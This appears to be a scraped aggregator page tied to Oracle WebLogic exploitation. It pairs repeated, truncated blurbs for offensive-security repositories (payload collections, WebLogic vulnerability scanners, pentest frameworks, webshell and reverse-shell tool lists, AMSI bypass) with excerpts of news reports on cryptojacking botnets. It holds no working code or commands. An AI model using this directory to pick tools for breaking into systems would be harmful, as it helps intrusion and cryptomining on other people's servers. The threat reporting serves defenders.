Payloads_All_The_Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

ReverseShellCommands

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

源工具链接:githubcom/rabbitmask/WeblogicScan Weblogic_Vuln_Scan 简体中文 | English 截至 2021 年 3 月 29 日,weblogic 漏洞扫描工具。若存在未记录且已公开 POC 的漏洞,欢迎提交 issue。 原作者已经收集得比较完整了,在这里做了部分的 bug 修复,部分脚本 POC 未生效,配置错误等问题。之前查了

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description an

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

weblogic 漏洞扫描工具。目前包含 CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551

源工具链接:githubcom/rabbitmask/WeblogicScan weblogicScaner 简体中文 | English 截至 2020 年 3 月 7 日,weblogic 漏洞扫描工具。若存在未记录且已公开 POC 的漏洞,欢迎提交 issue。 原作者已经收集得比较完整了,在这里做了部分的 bug 修复,部分脚本 POC 未生效,配置错误等问题。之前查了一下

jok3r*Jok3r* is a Python3 CLI application which is aimed at **helping penetration testers for network infrastructure and web black-box security tests**.

raw:: html image:: /pictures/logopng raw:: html image:: imgshieldsio/badge/python-36-bluesvg :target: wwwpythonorg/downloads/release/python-366/ :alt: Python 36 image:: readthedocsorg/projects/jok3r/badge/?version=latest :target: jok3rreadthedocsio/en/latest/ :alt: Documentation ReadTheDocs image:: im

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

5号黯区渗透手册 [TOC!] 各种网站 githubcom/fuzzdb-project/fuzzdb githubcom/danielmiessler/SecLists字典 githubcom/tennc/webshell 最全的Webshell脚本 githubcom/Ridter/Pentest 大牛的各种脚本 filemaytercn/ mayter的分享站点 wwwsomd5com/download/dict/字典 securityxplodedcom/downloadphp

Web应用程序安全性和Pentest / CTF的有用负载和绕过列表

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vu

Jok3r - Network and Web Pentest Framework

Jok3r - Network and Web Pentest Framework Jok3r es una aplicación CLI de Python3 que está dirigida a ayudar a los auditores de penetración en infraestructuras de red y pruebas de seguridad web de black-box Su principal objetivo es ahorrar tiempo en todo lo que se puede automatizar en la red/web a auditar para disfrutar más tiempo en cosas más

Windows Exploit Development Tutorial Series

Exploit Development Table of Contents General Acquiring Old/Vulnerable Software Practice Exploit Development/Structured Learning Exploitation Papers BOF ROP BlindROP SignalROP JumpROP Heap Format String Integer Overflows Null Pointer Dereference JIT-Spray ASLR Kernel Exploitation Use-After-Free Other Tutorials Assembly Writing Shellcode Windows Specific Linux specific

用于漏洞排查的pocsuite3验证POC代码

some_pocsuite 用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。 由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC备份在PocsuiteV2中。 插件代码编写 使用pocsuite3 漏洞测试框架,插件编写请参考 pocs

Recent Articles

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2021

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 20196 Min ReadThreat Intelligence SubscribeFollowtwitterfacebooklinkedinBeapy: Cryptojacking Worm Hits Enterprises in ChinaCryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign
Threatpost • Lindsey O'Donnell • 17 Feb 2021

Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years – in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.
The attack is still in operation as of this writing – and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system ...

Rocke Group’s Malware Now Has Worm Capabilities
Threatpost • Lindsey O'Donnell • 28 Jan 2021

Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.
The malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with “worm” capabilities and rootkit detection-evasion features.
“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at publ...

Chinese-linked Muhstik botnet targets Oracle WebLogic, Drupal
BleepingComputer • Ax Sharma • 11 Nov 2020

Muhstik botnet, also known as Mushtik, has been targeting cloud infrastructure and IoTs for years.
The botnet mainly funds itself by mining cryptocurrency using open source tools like XMRig and cgminer.
New details have emerged related to this malware that shed light on its nefarious activities and origins.
Muhstik is a botnet that leverages known web application exploits to compromise IoT devices, such as routers, to mine cryptocurrency.
It leverages IRC servers ...

Golang Worm Widens Scope to Windows, Adds Payload Capacity
Threatpost • Tara Seals • 25 Jun 2020

A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.
The malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetc...

Self-Propagating Lucifer Malware Targets Windows Systems
Threatpost • Lindsey O'Donnell • 24 Jun 2020

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.
The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of  taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes....

APT review: what the world’s threat actors got up to in 2019
Securelist • David Emm • 04 Dec 2019

What were the most interesting developments in terms of APT activity during the year and what can we learn from them?
This is not an easy question to answer, because researchers have only partial visibility and it´s impossible to fully understand the motivation for some attacks or the developments behind them. However, let´s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.
Target...

APT trends report Q3 2019
Securelist • GReAT • 16 Oct 2019

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, f...

Panda Threat Group Mines for Monero With Updated Payload, Targets
Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig
Threatpost • Tara Seals • 06 May 2019

Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there’s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks – especially since the bug is “trivial” to exploit.
Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle r...

Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw
Threatpost • Lindsey O'Donnell • 01 May 2019

UPDATE
A variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.
The newfound samples of Muhstik are targeting the recently-patched CVE-2019-2725 in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.
“From the timeline, we can see that the developer of Muhs...

Rocke's Cryptominers Kills Competition, Uninstall Cloud Security Products
BleepingComputer • Ionut Ilascu • 17 Jan 2019

Analysis of new malware samples used by the Rocke group for cryptojacking reveals code that uninstalls from Linux servers multiple cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.
Rocke's goal is to compromise Linux machines and use them to mine for Monero cryptocurrency. They exploit several vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion.
Analyzing the new malware strains used by Rocke, researchers from Palo Alto Network'...

Click It Up: Targeting Local Government Payment Portals
Fireeye Threat Research • by Nick Richard, DJ Palombo, Tyler Dean, Alexander Holcomb, Charles Carmakal • 19 Sep 2018

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small nu...

Click It Up: Targeting Local Government Payment Portals
Fireeye Threat Research • by Nick Richard, DJ Palombo, Tyler Dean, Alexander Holcomb, Charles Carmakal • 19 Sep 2018

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small nu...

Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code
BleepingComputer • Catalin Cimpanu • 24 Jul 2018

Oracle WebLogic servers are under attack from hackers who are trying to take over vulnerable installations that have not received a recent patch for a critical vulnerability.
The security bug at the heart of these hacking attempts is
, a vulnerability in a component of the Oracle WebLogic middleware that allows an attacker to gain control over the entire server without having to know its password.
The vulnerability has received a "critical" level and a severity score of 9.8 ou...

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners
Fireeye Threat Research • by Randi Eitzman, Kimberly Goody, Bryon Wolcott, Jeremy Kennelly • 18 Jul 2018

Introduction
Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations includ...

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners
Fireeye Threat Research • by Randi Eitzman, Kimberly Goody, Bryon Wolcott, Jeremy Kennelly • 18 Jul 2018

Introduction
Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations includ...

Malicious PowerShell Detection via Machine Learning
Fireeye Threat Research • by Victor Fang • 10 Jul 2018

Introduction
Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial in...

Malicious PowerShell Detection via Machine Learning
Fireeye Threat Research • by Victor Fang • 10 Jul 2018

Introduction
Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial in...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

New MassMiner Malware Targets Web Servers With an Assortment of Exploits
BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign —which they dubbed
— uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excellen...

Muhstik Botnet Exploits Highly Critical Drupal Bug
Threatpost • Lindsey O'Donnell • 23 Apr 2018

Researchers are warning a recently discovered and highly critical vulnerability found in Drupal’s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.
Now Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They sai...

GhostMiner Uses Fileless Techniques, Removes Other Miners, But Makes Only $200
BleepingComputer • Catalin Cimpanu • 23 Mar 2018

Security researchers from Minerva Labs have discovered a new strain of cryptocurrency-mining malware that uses PowerShell code to obtain fileless execution, and scans and stops the process of other miners that might be running on the same infected host.
But in spite of all these highly advanced techniques, this coinminer strain —codenamed
by researchers— has failed to earn any substantial revenue for its creators.
Experts say that after a three-week-long campaign, GhostMi...

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers
BleepingComputer • Catalin Cimpanu • 17 Feb 2018

A hacker group has made over $3 million by breaking into Jenkins servers and installing malware that mines the Monero cryptocurrency.
Hackers are targeting Jenkins, a continuous integration/deployment web application built in Java that allows dev teams to run automated tests and execute various operations based on test results, including deploying new code to production servers. Because of this, Jenkins servers are extremely popular with both freelance web developers, but also with large e...

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
Fireeye Threat Research • by Rakesh Sharma, Akhil Reddy, Kimberly Goody • 15 Feb 2018

Introduction
FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.
CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch thei...

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
Fireeye Threat Research • by Rakesh Sharma, Akhil Reddy, Kimberly Goody • 15 Feb 2018

Introduction
FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.
CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch thei...

Hackers Make Whopping $226K Installing Monero Miners on Oracle WebLogic Servers
BleepingComputer • Catalin Cimpanu • 11 Jan 2018

A group of hackers has made over a quarter-million dollars worth of Monero by breaking into Oracle WebLogic servers and installing a cryptocurrency miner.
The attacks have been going on since early December 2017, according to experts at the SANS Technology Institute and Morphus Labs.
Attackers used recently leaked proof-of-concept exploit code for the CVE-2017-10271 vulnerability in Oracle WebLogic servers, which Oracle patched two months before as part of the
.
The vuln...